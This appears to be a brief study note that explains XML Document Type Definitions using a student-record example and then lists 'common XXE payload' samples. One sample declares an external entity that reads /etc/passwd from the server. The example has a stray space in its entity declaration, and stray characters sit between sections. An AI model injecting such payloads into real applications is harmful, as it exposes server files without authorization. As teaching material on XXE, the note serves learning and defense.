to verify XML we have DTD which stands for Document Type Definition
<!DOCTYPE siswa [ <!ELEMENT siswa (nama,nik,alamat,nohp)> <!ELEMENT nama (#PCDATA)> <!ELEMENT nik (#PCDATA)> <!ELEMENT alamat (#PCDATA)> <!ELEMENT nohp (#PCDATA)> ]>
#PCDATA means parseable character data.
Β
common XXE payload
<!-- Example of XXE --> <!DOCTYPE replace [<!ENTITY name "feast"> ]> <userInfo> <firstName>falcon</firstName> <lastName>&name;</lastName> </userInfo> <!-- Read system file --> <!DOCTYPE root [<! ENTITY read SYSTEM 'file:///etc/passwd'>]> <root>&read;</root>
Β